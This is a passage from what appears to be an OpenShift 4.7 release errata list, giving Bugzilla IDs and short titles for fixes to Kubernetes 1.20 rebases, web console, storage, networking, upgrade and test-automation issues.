ValidatingWebhookConfiguration for snapshots 1908349 - Volume snapshot tests are failing after 1.20 rebase 1908353 - QE - Automation- pipelines runs scripts 1908361 - bump to k8s 1.20 1908367 - QE - Automation- pipelines triggers scripts 1908370 - QE - Automation- pipelines secrets scripts 1908375 - QE - Automation- pipelines workspaces scripts 1908381 - Go Dependency Fixes for Devfile Lib 1908389 - Loadbalancer Sync failing on Azure 1908400 - Tests-e2e, increase timeouts, re-add TestArchiveUploadedAndResultsReceived 1908407 - Backport Upstream 95269 to fix potential crash in kubelet 1908410 - Exclude Yarn from VSCode search 1908425 - Create Role Binding form subject type and name are undefined when All Project is selected 1908431 - When the marketplace-operator pod get's restarted, the custom catalogsources are gone, as well as the pods 1908434 - Remove &apos from metal3-plugin internationalized strings 1908437 - Operator backed with no icon has no badge associated with the CSV tag 1908459 - bump to k8s 1.20 1908461 - Add bugzilla component to OWNERS file 1908462 - RHCOS 4.6 ostree removed dhclient 1908466 - CAPO AZ Screening/Validating 1908467 - Zoom in and zoom out in topology package should be sentence case 1908468 - [Azure][4.7] Installer can't properly parse instance type with non integer memory size 1908469 - nbdb failed to come up while bringing up OVNKubernetes cluster 1908471 - OLM should bump k8s dependencies to 1.20 1908484 - oc adm release extract --cloud=aws --credentials-requests dumps all manifests 1908493 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM 1908545 - VM clone dialog does not open 1908557 - [e2e][automation]Miss css id on bootsource and reviewcreate step on wizard 1908562 - Pod readiness is not being observed in real world cases 1908565 - [4.6] Cannot filter the platform/arch of the index image 1908573 - Align the style of flavor 1908583 - bootstrap does not run on additional networks if configured for master in install-config 1908596 - Race condition on operator installation 1908598 - Persistent Dashboard shows events for all provisioners 1908641 - Go back to Catalog Page link on Virtual Machine page vanishes on empty state 1908648 - Skip TestKernelType test on OKD, adjust TestExtensions 1908650 - The title of customize wizard is inconsistent 1908654 - cluster-api-provider: volumes and disks names shouldn't change by machine-api-operator 1908675 - Reenable [sig-storage] CSI mock volume CSI FSGroupPolicy [LinuxOnly] should modify fsGroup if fsGroupPolicy=default [Suite:openshift/conformance/parallel] [Suite:k8s] 1908687 - Option to save user settings separate when using local bridge (affects console developers only) 1908697 - Showkubectl diff command in the oc diff help page 1908715 - Pressing the arrow up key when on topmost quick-search list item it should loop back to bottom 1908716 - UI breaks on click of sidebar of ksvc (if revisions not up) in topology on 4.7 builds 1908717 - "missing unit character in duration" error in some network dashboards 1908746 - [Safari] Drop Shadow doesn't works as expected on hover on workload 1908747 - stale S3 CredentialsRequest in CCO manifest 1908758 - AWS: NLB timeout value is rejected by AWS cloud provider after 1.20 rebase 1908830 - RHCOS 4.6 - Missing Initiatorname 1908868 - Update empty state message for EventSources and Channels tab 1908880 - 4.7 aws-serial CI: NoExecuteTaintManager Single Pod [Serial] eventually evict pod with finite tolerations from tainted nodes 1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference 1908888 - Dualstack does not work with multiple gateways 1908889 - Bump CNO to k8s 1.20 1908891 - TestDNSForwarding DNS operator e2e test is failing frequently 1908914 - CNO: upgrade nodes before masters 1908918 - Pipeline builder yaml view sidebar is not responsive 1908960 - QE - Design Gherkin Scenarios 1908971 - Gherkin Script for pipeline debt 4.7 1908983 - i18n: Add Horizontal Pod Autoscaler action menu is not translated 1908997 - Unsupported access mode should not be available when creating pvc by cinder-csi-driver/gcp-pd-csi-driver from web-console 1908998 - [cinder-csi-driver] doesn't detect the credentials change 1909004 - "No datapoints found" for RHEL node's filesystem graph 1909005 - i18n: workloads list view heading is not translated 1909012 - csi snapshot webhook does not block any invalid update for volumesnapshot and volumesnapshotcontent objects 1909027 - Disks option of Sectected capacity chart shows HDD disk even on selection of SDD disk type 1909043 - OCP + OCS 4.7 Internal - Storage cluster creation throws warning when zone=0 in VMware 1909067 - Web terminal should keep latest output when connection closes 1909070 - PLR and TR Logs component is not streaming as fast as tkn 1909092 - Error Message should not confuse user on Channel form 1909096 - OCP 4.7+OCS 4.7 - The Requested Cluster Capacity field needs to include the selected capacity in calculation in Review and Create Page 1909108 - Machine API components should use 1.20 dependencies 1909116 - Catalog Sort Items dropdown is not aligned on Firefox 1909198 - Move Sink action option is not working 1909207 - Accessibility Issue on monitoring page 1909236 - Remove pinned icon overlap on resource name 1909249 - Intermittent packet drop from pod to pod 1909276 - Accessibility Issue on create project modal 1909289 - oc debug of an init container no longer works 1909290 - Logging may be broken due to mix of k8s.io/klog v1 and v2 1909358 - registry.redhat.io/redhat/community-operator-index:latest only have hyperfoil-bundle 1909453 - Boot disk RAID can corrupt ESP if UEFI firmware writes to it 1909455 - Boot disk RAID will not boot if the primary disk enumerates but fails I/O 1909464 - Build operator-registry with golang-1.15 1909502 - NO_PROXY is not matched between bootstrap and global cluster setting which lead to desired master machineconfig is not found 1909521 - Add kubevirt cluster type for e2e-test workflow 1909527 - [IPI Baremetal] After upgrade from 4.6 to 4.7 metal3 pod does not get created 1909587 - [OCP4] all of the OCP master nodes with soft-anti-affinity run on the same OSP node 1909610 - Fix available capacity when no storage class selected 1909678 - scale up / down buttons available on pod details side panel 1909723 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART 1909730 - unbound variable error if EXTRA_PKGS_LIST is not defined 1909739 - Arbiter request data changes 1909744 - cluster-api-provider-openstack: Bump gophercloud 1909790 - PipelineBuilder yaml view cannot be used for editing a pipeline 1909791 - Update standalone kube-proxy config for EndpointSlice 1909792 - Empty states for some details page subcomponents are not i18ned 1909815 - Perspective switcher is only half-i18ned 1909821 - OCS 4.7 LSO installation blocked because of Error "Invalid value: "integer": spec.flexibleScaling in body 1909836 - operator-install-global Cypress test was failing in OLM as it depends on an operator that isn't installed in CI 1909864 - promote-release-openshift-machine-os-content-e2e-aws-4.5 is perm failing 1909911 - [OVN]EgressFirewall caused a segfault 1909943 - Upgrade from 4.6 to 4.7 stuck due to write /sys/devices/xxxx/block/sda/queue/scheduler: invalid argument 1909958 - Support Quick Start Highlights Properly 1909978 - ignore-volume-az = yes not working on standard storageClass 1909981 - Improve statement in template select step 1909992 - Fail to pull the bundle image when using the private index image 1910024 - Reload issue in latest(4.7) UI code on 4.6 cluster locally in dev 1910036 - QE - Design Gherkin Scenarios ODC-4504 1910049 - UPI: ansible-galaxy is not supported 1910127 - [UPI on oVirt]: Improve UPI Documentation 1910140 - fix the api dashboard with changes in upstream kube 1.20 1910160 - If two OperatorConditions include the same deployments they will keep updating the deployment's containers with the OPERATOR_CONDITION_NAME Environment Variable 1910165 - DHCP to static lease script doesn't handle multiple addresses 1910305 - [Descheduler] - The minKubeVersion should be 1.20.0 1910409 - Notification drawer is not localized for i18n 1910459 - Could not provision gcp volume if delete secret gcp-pd-cloud-credentials 1910492 - KMS details are auto-populated on the screen in next attempt at Storage cluster creation 1910501 - Installed Operators->Operand required: Clicking on cancel in Storage cluster page takes back to the Install Operator page 1910533 - [OVN] It takes about 5 minutes for EgressIP failover to work 1910581 - library-go: proxy ENV is not injected into csi-driver-controller which lead to storage operator never get ready 1910666 - Creating a Source Secret from type SSH-Key should use monospace font for better usability 1910738 - OCP 4.7 Installation fails on VMWare due to 1 worker that is degraded 1910739 - Redfish-virtualmedia (idrac) deploy fails on "The Virtual Media image server is already connected" 1910753 - Support Directory Path to Devfile 1910805 - Missing translation for Pipeline status and breadcrumb text 1910829 - Cannot delete a PVC if the dv's phase is WaitForFirstConsumer 1910840 - Show Nonexistent command info in theoc rollback -hhelp page 1910859 - breadcrumbs doesn't use last namespace 1910866 - Unify templates string 1910870 - Unify template dropdown action 1911016 - Prometheus unable to mount NFS volumes after upgrading to 4.6 1911129 - Monitoring charts renders nothing when switching from a Deployment to "All workloads" 1911176 - [MSTR-998] Wrong text shown when hovering on lines of charts in API Performance dashboard 1911212 - [MSTR-998] API Performance Dashboard "Period" drop-down has a choice "$__auto_interval_period" which can bring "1:154: parse error: missing unit character in duration" 1911213 - Wrong and misleading warning for VMs that were created manually (not from template) 1911257 - [aws-c2s] failed to create cluster, kube-cloud-config was not created 1911269 - waiting for the build message present when build exists 1911280 - Builder images are not detected for Dotnet, Httpd, NGINX 1911307 - Pod Scale-up requires extra privileges in OpenShift web-console 1911381 - "Select Persistent Volume Claim project" shows in customize wizard when select a source available template 1911382 - "source volumeMode (Block) and target volumeMode (Filesystem) do not match" shows in VM Error 1911387 - Hit error - "Cannot read property 'value' of undefined" while creating VM from template 1911408 - [e2e][automation] Add auto-clone cli tests and new flow of VM creation 1911418 - [v2v] The target storage class name is not displayed if default storage class is used 1911434 - git ops empty state page displays icon with watermark 1911443 - SSH Cretifiaction field should be validated 1911465 - IOPS display wrong unit 1911474 - Devfile Application Group Does Not Delete Cleanly (errors) 1911487 - Pruning Deployments should use ReplicaSets instead of ReplicationController 1911574 - Expose volume mode on Upload Data form 1911617 - [CNV][UI] Failure to add source to VM template when no default storage class is defined 1911632 - rpm-ostree command fail due to wrong options when updating ocp-4.6 to 4.7 on worker nodes with rt-kernel 1911656 - using 'operator-sdk run bundle' to install operator successfully, but the command output said 'Failed to run bundle'' 1911664 - [Negative Test] After deleting metal3 pod, scaling worker stuck on provisioning state 1911782 - Descheduler should not evict pod used local storage by the PVC 1911796 - uploading flow being displayed before submitting the form 1912066 - The ansible type operator's manager container is not stable when managing the CR 1912077 - helm operator's default rbac forbidden 1912115 - [automation] Analyze job keep failing because of 'JavaScript heap out of memory' 1912237 - Rebase CSI sidecars for 4.7 1912381 - [e2e][automation] Miss css ID on Create Network Attachment Definition page 1912409 - Fix flow schema deployment 1912434 - Update guided tour modal title 1912522 - DNS Operator e2e test: TestCoreDNSImageUpgrade is fundamentally broken 1912523 - Standalone pod status not updating in topology graph 1912536 - Console Plugin CR for console-demo-plugin has wrong apiVersion 1912558 - TaskRun list and detail screen doesn't show Pending status 1912563 - p&f: carry 97206: clean up executing request on panic 1912565 - OLM macOS local build broken by moby/term dependency 1912567 - [OCP on RHV] Node becomes to 'NotReady' status when shutdown vm from RHV UI only on the second deletion 1912577 - 4.1/4.2->4.3->...-> 4.7 upgrade is stuck during 4.6->4.7 with co/openshift-apiserver Degraded, co/network not Available and several other components pods CrashLoopBackOff 1912590 - publicImageRepository not being populated 1912640 - Go operator's controller pods is forbidden 1912701 - Handle dual-stack configuration for NIC IP 1912703 - multiple queries can't be plotted in the same graph under some conditons 1912730 - Operator backed: In-context should support visual connector if SBO is not installed 1912828 - Align High Performance VMs with High Performance in RHV-UI 1912849 - VM from wizard - default flavor does not match the actual flavor set by common templates 1912852 - VM from wizard - available VM templates - "storage" field is "0 B" 1912888 - recycler template should be moved to KCM operator 1912907 - Helm chart repository index can contain unresolvable relative URL's 1912916 - Set external traffic policy to cluster for IBM platform 1912922 - Explicitly specifying the operator generated default certificate for an ingress controller breaks the ingress controller 1912938 - Update confirmation modal for quick starts 1912942 - cluster-storage-operator: proxy ENV is not injected into vsphere-problem-detector deployment 1912944 - cluster-storage-operator: proxy ENV is not injected into Manila CSI driver operator deployment 1912945 - aws-ebs-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912946 - gcp-pd-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912947 - openstack-cinder-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912948 - csi-driver-manila-operator: proxy ENV is not injected into the CSI driver 1912949 - ovirt-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912977 - rebase upstream static-provisioner 1913006 - Remove etcd v2 specific alerts with etcd_http* metrics 1913011 - [OVN] Pod's external traffic not use egressrouter macvlan ip as a source ip 1913037 - update static-provisioner base image 1913047 - baremetal clusteroperator progressing status toggles between true and false when cluster is in a steady state 1913085 - Regression OLM uses scoped client for CRD installation 1913096 - backport: cadvisor machine metrics are missing in k8s 1.19 1913132 - The installation of Openshift Virtualization reports success early before it 's succeeded eventually 1913154 - Upgrading to 4.6.10 nightly failed with RHEL worker nodes: Failed to find /dev/disk/by-label/root 1913196 - Guided Tour doesn't handle resizing of browser 1913209 - Support modal should be shown for community supported templates 1913226 - [Migration] The SDN migration rollback failed if customize vxlanPort 1913249 - update info alert this template is not aditable 1913285 - VM list empty state should link to virtualization quick starts 1913289 - Rebase AWS EBS CSI driver for 4.7 1913292 - OCS 4.7 Installation failed over vmware when arbiter was enabled, as flexibleScaling is also getting enabled 1913297 - Remove restriction of taints for arbiter node 1913306 - unnecessary scroll bar is present on quick starts panel 1913325 - 1.20 rebase for openshift-apiserver 1913331 - Import from git: Fails to detect Java builder 1913332 - Pipeline visualization breaks the UI when multiple taskspecs are used 1913343 - (release-4.7) Added changelog file for insights-operator 1913356 - (release-4.7) Implemented gathering specific logs from openshift apiserver operator 1913371 - Missing i18n key "Administrator" in namespace "console-app" and language "en." 1913386 - users can see metrics of namespaces for which they don't have rights when monitoring own services with prometheus user workloads 1913420 - Time duration setting of resources is not being displayed 1913536 - 4.6.9 -> 4.7 upgrade hangs. RHEL 7.9 worker stuck on "error enabling unit: Failed to execute operation: File exists\\n\" 1913554 - Recording rule for ingress error fraction SLI is incorrect, uses irate instead of increase 1913560 - Normal user cannot load template on the new wizard 1913563 - "Virtual Machine" is not on the same line in create button when logged with normal user 1913567 - Tooltip data should be same for line chart or stacked chart, display data value same as the table 1913568 - Normal user cannot create template 1913582 - [Migration]SDN to OVN migration stucks on MCO for rhel worker 1913585 - Topology descriptive text fixes 1913608 - Table data contains data value None after change time range in graph and change back 1913651 - Improved Red Hat image and crashlooping OpenShift pod collection 1913660 - Change location and text of Pipeline edit flow alert 1913685 - OS field not disabled when creating a VM from a template 1913716 - Include additional use of existing libraries 1913725 - Refactor Insights Operator Plugin states 1913736 - Regression: fails to deploy computes when using root volumes 1913747 - Update operator to kubernetes 1.20.1 to pickup upstream fixes 1913751 - add third-party network plugin test suite to openshift-tests 1913783 - QE-To fix the merging pr issue, commenting the afterEach() block 1913807 - Template support badge should not be shown for community supported templates 1913821 - Need definitive steps about uninstalling descheduler operator 1913851 - Cluster Tasks are not sorted in pipeline builder 1913864 - BuildConfig YAML template references ruby ImageStreamTag that no longer exists 1913951 - Update the Devfile Sample Repo to an Official Repo Host 1913960 - Cluster Autoscaler should use 1.20 dependencies 1913969 - Field dependency descriptor can sometimes cause an exception 1914060 - Disk created from 'Import via Registry' cannot be used as boot disk 1914066 - [sriov] sriov dp pod crash when delete ovs HW offload policy 1914090 - Grafana - The resulting dataset is too large to graph (OCS RBD volumes being counted as disks) 1914119 - vsphere problem detector operator has no permission to update storages.operator.openshift.io instances 1914125 - Still using /dev/vde as default device path when create localvolume 1914183 - Empty NAD page is missing link to quickstarts 1914196 - target port infrom dockerfileflow does nothing 1914204 - Creating VM from dev perspective may fail with template not found error 1914209 - Associate image secret name to pipeline serviceaccount imagePullSecrets 1914212 - [e2e][automation] Add test to validate bootable disk souce 1914250 - ovnkube-node fails on master nodes when both DHCPv6 and SLAAC addresses are configured on nodes 1914284 - Upgrade to OCP 4.6.9 results in cluster-wide DNS and connectivity issues due to bad NetworkPolicy flows 1914287 - Bring back selfLink 1914301 - User VM Template source should show the same provider as template itself 1914303 - linuxptp-daemon is not forwarding ptp4l stderr output to openshift logs 1914309 - /terminal page when WTO not installed shows nonsensical error 1914334 - order of getting started samples is arbitrary 1914343 - [sig-imageregistry][Feature:ImageTriggers] Annotation trigger reconciles after the image is overwritten [Suite:openshift/conformance/parallel] timeout on s390x 1914349 - Increase and decrease buttons in max and min pods in HPA page has distorted UI 1914405 - Quick search modal should be opened when coming back from a selection 1914407 - Its not clear that node-ca is running as non-root 1914427 - Count of pods on the dashboard is incorrect 1914439 - Typo in SRIOV port create command example 1914451 - cluster-storage-operator pod running as root 1914452 - oc image append, oc image extract outputs wrong suggestion to use --keep-manifest-list=true 1914642 - Customize Wizard Storage tab does not pass validation 1914723 - SamplesTBRInaccessibleOnBoot Alert has a misspelling 1914793 - device names should not be translated 1914894 - Warn about using non-groupified api version 1914926 - webdriver-manager pulls incorrect version of ChomeDriver due to a bug 1914932 - Put correct resource name in relatedObjects 1914938 - PVC disk is not shown on customization wizard general tab 1914941 - VM Template rootdisk is not deleted after fetching default disk bus 1914975 - Collect logs from openshift-sdn namespace 1915003 - No estimate of average node readiness during lifetime of a cluster 1915027 - fix MCS blocking iptables rules 1915041 - s3:ListMultipartUploadParts is relied on implicitly 1915079 - Canary controller should not periodically rotate the canary route endpoint for performance reasons 1915080 - Large number of tcp connections with shiftstack ocp cluster in about 24 hours 1915085 - Pods created and rapidly terminated get stuck 1915114 - [aws-c2s] worker machines are not create during install 1915133 - Missing default pinned nav items in dev perspective 1915176 - Update snapshot API CRDs to v1 in web-console when creating volumesnapshot related resource 1915187 - Remove the "Tech preview" tag in web-console for volumesnapshot 1915188 - Remove HostSubnet anonymization 1915200 - [OCP 4.7+ OCS 4.6]Arbiter related Note should not show up during UI deployment 1915217 - OKD payloads expect to be signed with production keys 1915220 - Remove dropdown workaround for user settings 1915235 - Failed to upgrade to 4.7 from 4.6 due to the machine-config failure 1915262 - When deploying with assisted install the CBO operator is installed and enabled without metal3 pod 1915277 - [e2e][automation]fix cdi upload form test 1915295 - [BM][IP][Dualstack] Installation failed - operators report dial tcp 172.30.0.1:443: i/o timeout 1915304 - Updating scheduling component builder & base images to be consistent with ART 1915312 - Prevent schedule Linux openshift-network-diagnostics pod on Windows node 1915318 - [Metal] bareMetal IPI - cannot interact with toolbox container after first execution only in parallel from different connection 1915348 - [RFE] linuxptp operator needs to expose the uds_address_socket to be used by an application pod 1915357 - Dev Catalog doesn't load anything if virtualization operator is installed 1915379 - New template wizard should require provider and make support input a dropdown type 1915408 - Failure in operator-registry kind e2e test 1915416 - [Descheduler] descheduler evicts pod which does not have any ownerRef or descheduler evict annotation 1915460 - Cluster name size might affect installations 1915500 - [aws c2s] kube-controller-manager crash loops trying to fetch the AWS instance 1915540 - Silent 4.7 RHCOS install failure on ppc64le 1915579 - [Metal] redhat-support-tool became unavailable after tcpdump usage (BareMetal IPI) 1915582 - p&f: carry upstream pr 97860 1915594 - [e2e][automation] Improve test for disk validation 1915617 - Bump bootimage for various fixes 1915624 - "Please fill in the following field: Template provider" blocks customize wizard 1915627 - Translate Guided Tour text. 1915643 - OCP4.6 to 4.7 upgrade failed due to manila csi driver operator sync error 1915647 - Intermittent White screen when the connector dragged to revision 1915649 - "Template support" pop up is not a warning; checkbox text should be rephrased 1915654 - [e2e][automation] Add a verification for Afinity modal should hint "Matching node found" 1915661 - Can't run the 'oc adm prune' command in a pod 1915672 - Kuryr doesn't work with selfLink disabled. 1915674 - Golden image PVC creation - storage size should be taken from the template 1915685 - Message for not supported template is not clear enough 1915760 - Need to increase timeout to wait rhel worker get ready 1915793 - quick starts panel syncs incorrectly across browser windows 1915798 - oauth connection errors for openshift console pods on an OVNKube OCP 4.7 cluster 1915818 - vsphere-problem-detector: use "_totals" in metrics 1915828 - Latest Dell firmware (04.40.00.00) fails to install IPI on BM using idrac-virtualmedia protocol 1915859 - vsphere-problem-detector: does not report ESXi host version nor VM HW version 1915871 - operator-sdk version in new downstream image should be v1.2.0-ocp not v4.7.0 1915879 - Pipeline Dashboard tab Rename to Pipeline Metrics 1915885 - Kuryr doesn't support workers running on multiple subnets 1915898 - TaskRun log output shows "undefined" in streaming 1915907 - test/cmd/builds.sh uses docker.io 1915912 - sig-storage-csi-snapshotter image not available 1915926 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART 1915929 - A11y Violation: svg-img-alt for time axis of Utilization Card on Cluster Dashboard 1915939 - Resizing the browser window removes Web Terminal Icon 1915945 - [sig-scheduling] SchedulerPreemption [Serial] validates basic preemption works [Conformance] 1915959 - Baremetal cluster operator is included in a ROKS installation of 4.7 1915962 - ROKS: manifest with machine health check fails to apply in 4.7 1915972 - Global configuration breadcrumbs do not work as expected 1915981 - Install ethtool and conntrack in container for debugging 1915995 - "Edit RoleBinding Subject" action under RoleBinding list page kebab actions causes unhandled exception 1915998 - Installer bootstrap node setting of additional subnets inconsistent with additional security groups 1916021 - OLM enters infinite loop if Pending CSV replaces itself 1916056 - Need Visual Web Terminal metric enabled for OCP monitoring telemetry 1916081 - non-existant should be non-existent in CloudCredentialOperatorTargetNamespaceMissing alert's annotations 1916099 - VM creation - customization wizard - user should be allowed to delete and re-create root disk 1916126 - [e2e][automation] Help fix tests for vm guest-agent and next-run-configuration 1916145 - Explicitly set minimum versions of python libraries 1916164 - Update csi-driver-nfs builder & base images to be consistent with ART 1916221 - csi-snapshot-controller-operator: bump dependencies for 4.7 1916271 - Known issues should mention failure to apply soft-anti-affinity to masters beyond the third 1916363 - [OVN] ovs-configuration.service reports as failed within all nodes using version 4.7.0-fc.2 1916379 - error metrics from vsphere-problem-detector should be gauge 1916382 - Can't create ext4 filesystems with Ignition 1916384 - 4.5.15 and later cluster-version operator does not sync ClusterVersion status before exiting, leaving 'verified: false' even for verified updates 1916401 - Deleting an ingress controller with a bad DNS Record hangs 1916417 - [Kuryr] Must-gather does not have all Custom Resources information 1916419 - [sig-devex][Feature:ImageEcosystem][Slow] openshift images should be SCL enabled returning s2i usage when running the image 1916454 - teach CCO about upgradeability from 4.6 to 4.7 1916486 - [OCP RHV] [Docs] Update RHV CSI provisioning section in OCP documenation 1916502 - Boot disk mirroring fails with mdadm error 1916524 - Two rootdisk shows on storage step 1916580 - Default yaml is broken for VM and VM template 1916621 - oc adm node-logs examples are wrong 1916642 - [zh_CN] Redundant period in Secrets - Create drop down menu - Key value secret. 1916692 - Possibly fails to destroy LB and thus cluster 1916711 - Update Kube dependencies in MCO to 1.20.0 1916747 - remove links to quick starts if virtualization operator isn't updated to 2.6 1916764 - editing a workload with no application applied, will auto fill the app 1916834 - Pipeline Metrics - Text Updates 1916843 - collect logs from openshift-sdn-controller pod 1916853 - cluster will not gracefully recover if openshift-etcd namespace is removed 1916882 - OCS 4.7 LSO : wizard (Discover disks and create storageclass) does not show zone when topology.kubernetes.io/zone are added manually 1916888 - OCS wizard Donor chart does not get updated whenDevice Typeis edited 1916938 - Using 4.6 install-config.yaml file with lbFloatingIP results in validation error "Forbidden: cannot specify lbFloatingIP and apiFloatingIP together" 1916949 - ROKS: manifests in openshift-oauth-apiserver ns fails to create with non-existent namespace 1917101 - [UPI on oVirt] - 'RHCOS image' topic isn't located in the right place in UPI document 1917114 - Upgrade from 4.5.9 to 4.7 fails as authentication operator is Degraded due to '"ProxyConfigController" controller failed to sync "key"' error 1917117 - Common templates - disks screen: invalid disk name 1917124 - Custom template - clone existing PVC - the name of the target VM's data volume is hard-coded; only one VM can be created 1917146 - [oVirt] Consume 23-10 ovirt sdk- csi operator 1917147 - [oVirt] csi operator panics if ovirt-engine suddenly becomes unavailable. 1917148 - [oVirt] Consume 23-10 ovirt sdk 1917239 - Monitoring time options overlaps monitoring tab navigation when Quickstart panel is opened 1917272 - Should update the default minSize to 1Gi when create localvolumeset on web console 1917303 - [automation][e2e] make kubevirt-plugin gating job mandatory 1917315 - localvolumeset-local-provisoner-xxx pods are not killed after upgrading from 4.6 to 4.7 1917327 - annotations.message maybe wrong for NTOPodsNotReady alert 1917367 - Refactor periodic.go 1917371 - Add docs on how to use the built-in profiler 1917372 - Application metrics are shown on Metrics dashboard but not in linked Prometheus UI in OCP management console 1917395 - pv-pool backing store name restriction should be at 43 characters from the ocs ui 1917484 - [BM][IPI] Failed to scale down machineset 1917522 - Deprecate --filter-by-os in oc adm catalog mirror 1917537 - controllers continuously busy reconciling operator 1917551 - use min_over_time for vsphere prometheus alerts 1917585 - OLM Operator install page missing i18n 1917587 - Manila CSI operator becomes degraded if user doesn't have permissions to list share types 1917605 - Deleting an exgw causes pods to no longer route to other exgws 1917614 - [aws c2s] ingress operator uses unavailable resourcegrouptaggings API 1917656 - Add to Project/application for eventSources from topology shows 404 1917658 - Show TP badge for sources powered by camel connectors in create flow 1917660 - Editing parallelism of job get error info 1917678 - Could not provision pv when no symlink and target found on rhel worker 1917679 - Hide double CTA in admin pipelineruns tab 1917683 -NodeTextFileCollectorScrapeErroralert in OCP 4.6 cluster. 1917759 - Console operator panics after setting plugin that does not exists to the console-operator config 1917765 - ansible-operator version in downstream image should be v1.3.0 not v4.7.0 1917770 - helm-operator version in downstream image should be v1.3.0 not v4.7.0 1917799 - Gather s list of names and versions of installed OLM operators 1917803 - [sig-storage] Pod Disks should be able to delete a non-existent PD without error 1917814 - Show Broker create option in eventing under admin perspective 1917838 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types 1917872 - [oVirt] rebase on latest SDK 2021-01-12 1917911 - network-tools needs ovnkube-trace binary from ovn-kubernetes image 1917938 - upgrade version of dnsmasq package 1917942 - Canary controller causes panic in ingress-operator 1918019 - Undesired scrollbars in markdown area of QuickStart 1918068 - Flaky olm integration tests 1918085 - reversed name of job and namespace in cvo log 1918112 - Flavor is not editable if a customize VM is created from cli 1918129 - Update IO sample archive with missing resources & remove IP anonymization from clusteroperator resources 1918132 - i18n: Volume Snapshot Contents menu is not translated 1918133 - [e2e][automation] Fix ocp 4.7 existing tests - part2 1918140 - Deployment openstack-cinder-csi-driver-controller and openstack-manila-csi-controllerplugin doesn't be installed on OSP 1918153 - When&character is set as an environment variable in a build config it is getting converted as\u00261918185 - Capitalization on PLR details page 1918287 - [ovirt] ovirt csi driver is flooding RHV with API calls and spam the event UI with new connections 1918318 - Kamelet connector's are not shown in eventing section under Admin perspective 1918351 - Gather SAP configuration (SCC & ClusterRoleBinding) 1918375 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews 1918395 - [ovirt] increase livenessProbe period 1918415 - MCD nil pointer on dropins 1918438 - [ja_JP, zh_CN] Serverless i18n misses 1918440 - Kernel Arguments get reapplied even when no new kargs has been added in MachineConfig 1918471 - CustomNoUpgrade Feature gates are not working correctly 1918558 - Supermicro nodes boot to PXE upon reboot after successful deployment to disk 1918622 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART 1918623 - Updating ose-jenkins-agent-nodejs-12 builder & base images to be consistent with ART 1918625 - Updating ose-jenkins-agent-nodejs-10 builder & base images to be consistent with ART 1918635 - Updating openshift-jenkins-2 builder & base images to be consistent with ART #1197 1918639 - Event listener with triggerRef crashes the console 1918648 - Subscription page doesn't show InstallPlan correctly 1918716 - Manilacsi becomes degraded even though it is not available with the underlying Openstack 1918748 - helmchartrepo is not http(s)_proxy-aware 1918757 - Consistant fallures of features/project-creation.feature Cypress test in CI 1918803 - Need dedicated details page w/ global config breadcrumbs for 'KnativeServing' plugin 1918826 - Insights popover icons are not horizontally aligned 1918879 - need better debug for bad pull secrets 1918958 - The default NMstate instance from the operator is incorrect 1919097 - Close bracket ")" missing at the end of the sentence in the UI 1919231 - quick search modal cut off on smaller screens 1919259 - Make "Add x" singular in Pipeline Builder 1919260 - VM Template list actions should not wrap 1919271 - NM prepender script doesn't support systemd-resolved 1919341 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART 1919360 - Need managed-cluster-info metric enabled for OCP monitoring telemetry 1919379 - dotnet logo out of date 1919387 - Console login fails with no error when it can't write to localStorage 1919396 - A11y Violation: svg-img-alt on Pod Status ring 1919407 - OpenStack IPI has three-node control plane limitation, but InstallConfigs aren't verified 1919750 - Search InstallPlans got Minified React error 1919778 - Upgrade is stuck in insights operator Degraded with "Source clusterconfig could not be retrieved" until insights operator pod is manually deleted 1919823 - OCP 4.7 Internationalization Chinese tranlate issue 1919851 - Visualization does not render when Pipeline & Task share same name 1919862 - The tip information foroc new-project --skip-config-writeis wrong 1919876 - VM created via customize wizard cannot inherit template's PVC attributes 1919877 - Click on KSVC breaks with white screen 1919879 - The toolbox container name is changed from 'toolbox-root' to 'toolbox-' in a chroot environment 1919945 - user entered name value overridden by default value when selecting a git repository 1919968 - [release-4.7] Undiagnosed panic detected in pod runtime.go:76: invalid memory address or nil pointer dereference 1919970 - NTO does not update when the tuned profile is updated. 1919999 - Bump Cluster Resource Operator Golang Versions 1920027 - machine-config-operator consistently failing during 4.6 to 4.7 upgrades and clusters do not install successfully with proxy configuration 1920200 - user-settings network error results in infinite loop of requests 1920205 - operator-registry e2e tests not working properly 1920214 - Bump golang to 1.15 in cluster-resource-override-admission 1920248 - re-running the pipelinerun with pipelinespec crashes the UI 1920320 - VM template field is "Not available" if it's created from common template 1920367 - When creating localvolumeset instance from the web console, the title for setting volumeMode isDisk Mode1920368 - Fix containers creation issue resulting in runc running on Guaranteed Pod CPUs 1920390 - Monitoring > Metrics graph shifts to the left when clicking the "Stacked" option and when toggling data series lines on / off 1920426 - Egress Router CNI OWNERS file should have ovn-k team members 1920427 - Need to updateoc loginhelp page since we don't support prompt interactively for the username 1920430 - [V2V] [UI] Browser window becomes empty when running import wizard for the first time 1920438 - openshift-tuned panics on turning debugging on/off. 1920445 - e2e-gcp-ovn-upgrade job is actually using openshift-sdn 1920481 - kuryr-cni pods using unreasonable amount of CPU 1920509 - wait for port 6443 to be open in the kube-scheduler container; use ss instead of lsof 1920524 - Topology graph crashes adding Open Data Hub operator 1920526 - catalog operator causing CPU spikes and bad etcd performance 1920551 - Boot Order is not editable for Templates in "openshift" namespace 1920555 - bump cluster-resource-override-admission api dependencies 1920571 - fcp multipath will not recover failed paths automatically 1920619 - Remove default scheduler profile value 1920655 - Console should not show the Create Autoscaler link in cluster settings when the CRD is not present 1920674 - MissingKey errors in bindings namespace 1920684 - Text in language preferences modal is misleading 1920695 - CI is broken because of bad image registry reference in the Makefile 1920756 - update generic-admission-server library to get the system:masters authorization optimization 1920769 - [Upgrade] OCP upgrade from 4.6.13 to 4.7.0-fc.4 for "network-check-target" failed when "defaultNodeSelector" is set 1920771 - i18n: Delete persistent volume claim drop down is not translated 1920806 - [OVN]Nodes lost network connection after 